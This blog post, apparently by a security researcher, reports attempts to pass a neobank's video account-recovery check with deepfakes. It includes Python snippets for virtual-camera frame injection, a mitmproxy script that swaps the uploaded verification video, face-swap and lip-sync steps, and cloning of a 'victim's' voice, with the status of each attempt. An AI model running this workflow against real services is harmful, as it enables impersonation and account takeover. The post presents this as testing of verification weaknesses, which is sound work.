When a new tool called "Deepfake Offensive Toolkit" was released, claiming that you can now inject real-time deepfakes into a virtual camera and bypass biometric liveness checks, I was thrilled! As you may have noticed, all my recent posts relate to fake identities and bypassing KYC checks at financial institutions. I thought, why not give it a go and bypass biometric verification with the power of machine learning?
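For readers wondering what "injecting into a virtual camera" means in practice, here is a minimal sketch of the idea using OpenCV and the pyvirtualcam library. This is my own illustration of the technique, not dot's actual code, and the file name is a placeholder:

```python
import cv2
import pyvirtualcam

# Feed pre-rendered (or live-generated) deepfake frames into a virtual
# camera device. Any app that opens the webcam sees these frames instead.
video = cv2.VideoCapture("deepfake.mp4")  # placeholder source file
WIDTH, HEIGHT, FPS = 640, 480, 30

with pyvirtualcam.Camera(width=WIDTH, height=HEIGHT, fps=FPS) as cam:
    while True:
        ok, frame = video.read()
        if not ok:
            break
        frame = cv2.resize(frame, (WIDTH, HEIGHT))
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)  # pyvirtualcam expects RGB
        cam.send(frame)
        cam.sleep_until_next_frame()  # keep a steady frame rate

video.release()
```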
Before putting everything in place, I needed to find a target app and establish testing conditions. After looking at a few neobanks on my phone, I found one that asked for a short video recording in certain account-recovery cases, when the bank was unsure about your identity. You still had to have a lot of information at hand to get access to the account, such as photos of IDs, access to email and, potentially, card details. A decent deepfake requires hours of high-quality videos or photos of a person. All of this is hard to get if the criminals don't know the victim. But everything changes if it is someone from the inside: your teenage kid, your angry ex or your business partner will have photos of your ID, private videos and temporary access to your email and phone. This is our attacker.
With the prerequisites figured out, we can play with ML frameworks. But before we start making fake videos, we need to walk through the unmodified verification scenario to have a reference point. I reset the app, triggered the verification conditions, created a 640x480 video and, using my jailbroken iPhone, successfully submitted this video and passed the verification checks.
During the reference check, I found that:
- I can trigger the verification requests and automatically substitute the video files submitted for verification (a sketch of the idea follows this list).
- I can do as many verifications as I want. Even if one attempt fails, I can trigger another that won't be affected by the previous results.
- Every verification takes a different amount of time to approve, so it's likely done by humans.
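To illustrate the substitution point, here is a hypothetical sketch of how an intercepting proxy such as mitmproxy could swap the uploaded recording for a prepared file. The endpoint path and file names are made up (not the bank's real API), and my actual setup relied on a jailbroken iPhone:

```python
# substitute.py - run with: mitmproxy -s substitute.py
from mitmproxy import http

# Prepared deepfake recording to submit instead of the live capture.
PREPARED_VIDEO = open("prepared_640x480.mp4", "rb").read()

def request(flow: http.HTTPFlow) -> None:
    # Hypothetical upload endpoint; the real path would differ.
    if flow.request.method == "POST" and "/verification/video" in flow.request.path:
        flow.request.content = PREPARED_VIDEO  # swap the uploaded body
```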
Example 1. Deepfake Offensive Toolkit, try 1
I asked a friend with a similar haircut and facial features to record the test video and send it to me so I could apply the deepfake toolkit to it. Unfortunately, the quality wasn't anywhere near satisfactory:
Status: verification wasn't initiated
Example 2. Deepfake Offensive Toolkit, try 2
After giving up on playing with different configuration options, I decided to apply my own photo to my own video!
This is something I can work with! At first, I was sure that the video verification procedure would fail and that I would have to provide more documents. But not at all! The verification came back successful despite obvious signs of manipulation: a blurry face, uneven facial edges and traces of editing in the resulting file.
Status: verification passed
Example 3. DeepFaceLab, try 1
I learned that real-time deepfakes are still far from realistic. But I didn't need real-time substitution, so I tried another project – DeepFaceLab. This framework produces impressive results given the right quality of video sources and enough resources spent on model training.
But to save some time, I started with the same setup: substituting myself for myself. I recorded a 1000-frame video of myself and then trained a SAEHD model to be placed onto another video of mine:
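For reference, DFL works from individual frames rather than the video file itself. Here is a minimal sketch of the frame-extraction step using OpenCV; DFL's own extraction scripts do the equivalent, and the paths are placeholders:

```python
import os
import cv2

# Split the recorded source video into individual frames - the input
# DFL's face extractor works from. Paths are placeholders.
os.makedirs("workspace/data_src", exist_ok=True)
video = cv2.VideoCapture("src_recording.mp4")

index = 0
while True:
    ok, frame = video.read()
    if not ok:
        break
    cv2.imwrite(f"workspace/data_src/{index:05d}.png", frame)
    index += 1

video.release()
print(f"Extracted {index} frames")  # ~1000 frames for the SRC set
```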
This is a fake me, generated by the DFL framework. Again, the signs of a deepfake are obvious: you can see the substituted, blurry facial shape, which would trick only someone with very poor eyesight. But this also worked! So far, so good.
Status: verification passed
Example 4. DeepFaceLab, try 2
I took the original video that I requested from my friend and applied a re-trained model to this video:
This is a more decent-quality video than my first try, but still far from perfect. A few problems here:
- Different face colours, making the edges more obvious. As I found later, the right DFL model parameters fix this (see the colour-transfer sketch after this list).
- A straight edge along the fringe's shadow. It could be rectified with the right destination video and proper mask training.
- No glasses. Their absence could trigger a red flag for video recognition services. Unfortunately, wearing glasses creates horrible artefacts; these conditions should be examined further.
- The destination recording had the wrong articulation, which could trigger another red flag.
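On the first point: the idea behind DFL's colour-transfer options is to match the colour statistics of the swapped face to the destination frame. Here is a minimal sketch of Reinhard-style colour transfer in LAB space with OpenCV and NumPy, as an illustration of the technique rather than DFL's exact implementation:

```python
import cv2
import numpy as np

def reinhard_color_transfer(face: np.ndarray, dest: np.ndarray) -> np.ndarray:
    """Match the colour statistics of the swapped face to the destination
    frame in LAB space, so the blend edges become less obvious."""
    face_lab = cv2.cvtColor(face, cv2.COLOR_BGR2LAB).astype(np.float32)
    dest_lab = cv2.cvtColor(dest, cv2.COLOR_BGR2LAB).astype(np.float32)

    f_mean, f_std = face_lab.mean(axis=(0, 1)), face_lab.std(axis=(0, 1))
    d_mean, d_std = dest_lab.mean(axis=(0, 1)), dest_lab.std(axis=(0, 1))

    # Shift and rescale each LAB channel to the destination's statistics.
    result = (face_lab - f_mean) / (f_std + 1e-6) * d_std + d_mean
    result = np.clip(result, 0, 255).astype(np.uint8)
    return cv2.cvtColor(result, cv2.COLOR_LAB2BGR)
```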
Alas, this video didn't pass the checks. But I was sure it was possible to create the right video to pass the verification procedure.
Status: verification failed
Example 5. No glasses
No one tried to block me permanently after a few failed checks. That's amazing, I thought! It means I can try to determine some of the black-box conditions of the verification process.
As glasses are an integral part of some people's lives, what if their absence was the main reason for the failed verification? I sent an unmodified video of myself without glasses. And I failed the verification! Even though absolutely nothing had been changed!
Status: verification failed
Example 6. DeepNostalgia+Wav2lip+Face-SPARNet
Now that we know glasses are crucial, I know what I need in the final video. There's only one problem: deepfakes with glasses have always been of very low quality.
Alexander, a brilliant ML scientist, suggested I look at https://www.myheritage.com/deep-nostalgia to animate my photo with glasses in a way that keeps them within my face shape. I used it to create a short video of myself:
Not the best quality, but not the worst either.
Now we need to get rid of the watermarks (apologies for that) and apply the Wav2Lip framework, which makes me "pronounce" the words. That made the quality of the final video even lower, so I improved it with Face-SPARNet:
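For reference, the lip-sync step uses Wav2Lip's documented inference entry point. The command shape below follows the repo's README, the checkpoint is the repo's pretrained GAN model, and the input file names are my placeholders:

```python
import subprocess

# Re-sync the animated portrait's lips to the required sentence using
# Wav2Lip's inference script. Run from inside the Wav2Lip repo.
subprocess.run([
    "python", "inference.py",
    "--checkpoint_path", "checkpoints/wav2lip_gan.pth",  # pretrained GAN model
    "--face", "animated_portrait.mp4",                   # placeholder input video
    "--audio", "required_sentence.wav",                  # placeholder audio
], check=True)
# Wav2Lip writes its output to results/result_voice.mp4
```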
Unfortunately, the final quality was not good enough, and the verification failed.
Status: verification failed
Example 7. Animate Photos AI+Wav2lip+ Face-SPARNet+DeepFaceLab
At one point, something clicked in my head. If I have a three-second recording, I can take one photo of a victim, create an animated video from that photo alone and then reapply high-res sources to it using DeepFaceLab to drastically improve the quality! The final steps, in which the existing problems from the previous examples were addressed:
1. The DFL destination video quality was improved by purchasing Animate Photos AI (https://pixbim.com/animate-photos-pixbim). That also helped with removing the watermarks.
2. Animate Photos AI detects the face and produces a square video, so I had to "fool" the algorithm so it would make a video I could later cut into a 640x480 product (see the cropping sketch after this list):
3. Wav2lip and post-editing with Face-SPARNet created some additional artefacts at the bottom of the video:
4. The Wav2Lip-HQ fork wasn't producing a lip sync of sufficient quality, so I recorded my own lips saying what I needed and put them on top of the video. As this would be substituted using DFL later, it didn't matter!
5. Take the rest of the high-res video of the "victim" and use it as the SRC for DFL. I trained the SAEHD model from scratch using Google Colab, and honestly, the results were impressive: https://drive.google.com/file/d/1Ei9W5t9KDOLZUtfrXgjmAfWJVEVLejoM/view?usp=sharing
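On step 2: once the square video exists, cutting it down to the 640x480 frame the app expects is straightforward. A sketch with OpenCV, assuming the square output is at least 640 pixels wide and 480 tall; file names are placeholders:

```python
import cv2

# Cut a centred 640x480 region out of Animate Photos AI's square output.
src = cv2.VideoCapture("square_animation.mp4")
fps = src.get(cv2.CAP_PROP_FPS) or 30.0
fourcc = cv2.VideoWriter_fourcc(*"mp4v")
out = cv2.VideoWriter("cropped_640x480.mp4", fourcc, fps, (640, 480))

while True:
    ok, frame = src.read()
    if not ok:
        break
    h, w = frame.shape[:2]
    x0 = (w - 640) // 2  # centre the crop horizontally
    y0 = (h - 480) // 2  # and vertically
    out.write(frame[y0:y0 + 480, x0:x0 + 640])

src.release()
out.release()
```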
Final example. RealTimeVoiceCloning
When I was testing whether the lip sync could be a problem, I decided to make a video where the lips don't match what the voice is saying. In addition to that, I decided to generate a completely artificial voice: an insider may have recordings of the victim's voice but would hardly have the exact sentence the bank expects them to say. And because this article is about deepfake tools, I took the Real-Time-Voice-Cloning framework. After brief training on 10-15 minutes of voice recordings, I produced a decent-quality voice fake saying whatever I wished:
https://drive.google.com/file/d/1Dseplf_nbtact6rTKPScpe19UhYRl_WD/view?usp=sharing
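For those curious, the cloning flow roughly follows the repo's demo_cli.py: embed the victim's voice, synthesize a spectrogram for the target sentence, then vocode it into audio. The model paths and file names below are assumptions, and the internal API may differ between repo versions:

```python
# Run from inside the Real-Time-Voice-Cloning repo.
from pathlib import Path
import numpy as np
import soundfile as sf

from encoder import inference as encoder
from synthesizer.inference import Synthesizer
from vocoder import inference as vocoder

# Model paths are assumptions - adjust to wherever the pretrained
# checkpoints were downloaded.
encoder.load_model(Path("saved_models/default/encoder.pt"))
synthesizer = Synthesizer(Path("saved_models/default/synthesizer.pt"))
vocoder.load_model(Path("saved_models/default/vocoder.pt"))

# Build a voice embedding from a sample of the victim's recordings.
wav = encoder.preprocess_wav(Path("victim_voice_sample.wav"))
embed = encoder.embed_utterance(wav)

# Synthesize a mel spectrogram for the sentence the bank expects...
specs = synthesizer.synthesize_spectrograms(
    ["The exact sentence the bank asked for"], [embed]
)

# ...and vocode it into a waveform.
generated = vocoder.infer_waveform(specs[0])
sf.write("cloned_sentence.wav", generated.astype(np.float32), Synthesizer.sample_rate)
```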
As you can hear, this voice sounds quite different from my original voice. In addition to that, I recorded a video of myself saying words different from those in the audio:
So again, I wasn't sure if I would pass the verification.
It worked! That means the bank employees don't have a reference for my voice, and whoever checks the recordings pays more attention to the video than to the audio.
Status: verification passed
Reflections on the verification testing process.
Recommendations for banks, and pretty much everyone else who relies on photo/video/audio verification:
These days, it's fairly simple to create deepfake content, and not just for a proof of concept or a funny TikTok video. Using open-source tools or commercial mass-market products, criminals with enough patience and even a shallow understanding of the technology can bypass banks' restrictions.